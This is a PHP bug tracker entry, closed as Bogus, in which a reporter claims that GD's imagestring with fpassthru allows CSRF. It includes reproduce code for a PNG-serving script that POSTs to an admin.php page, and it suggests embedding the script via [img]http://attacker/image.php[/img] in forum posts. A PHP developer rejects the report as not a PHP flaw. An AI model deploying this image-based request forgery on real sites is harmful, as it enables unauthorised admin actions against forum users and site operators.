ID: 47939
Updated by: [email protected]
Reported By: elmasterlow at gmail dot com
-Status: Feedback
+Status: Bogus
Bug Type: GD related
Operating System: *
PHP Version: 5.3CVS-2009-04-09 (CVS)
New Comment:
Why is it a imagestring problem? You can build attacks using php or any
other languages.
imagestring will simply draw a text using the number of characters sent
by fpassthru, which will be executed before imagestring. That's the same
as doing:
header('Content-Type: image/png');
fpassthru($fp);
// create an image, draw something, sent it
// ...
imagepng($im);
Previous Comments:
------------------------------------------------------------------------
[2009-04-10 12:28:18] [email protected]
With which PHP version did you test this?
------------------------------------------------------------------------
[2009-04-09 21:10:10] elmasterlow at gmail dot com
Description:
------------
With this vulnerability we could do any function in php on image.
In this case the vulnerability can be used to do a CSRF attack.
We can insert the img in BB tags at random forum for example.
I think there is any possible way to make a js code...
Reproduce code:
---------------
<?
header('Content-Type: image/png');
$img = 'obrazek.png';
$data = array ('foo' => 'bar', 'foo2' => 'bar2');
$data = http_build_query($data);
$context_options = array ('http' => array(
'method' => 'POST',
'header'=> "Content-type:
application/x-www-form-urlencoded\r\n"."Content-Length:
".strlen($data)."\r\n",
'content' => $data
));
$context = stream_context_create($context_options);
$fp = fopen('http://example.com/admin.php', 'r', false, $context);
imagestring($im, 1, 5, 5, fpassthru($fp) . $img, $tc);
imagepng($im);
imagedestroy($im);
?>
Expected result:
----------------
Insert [img]http://attacker/image.php[/img] on target site to do any
function in image.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=47939&edit=1
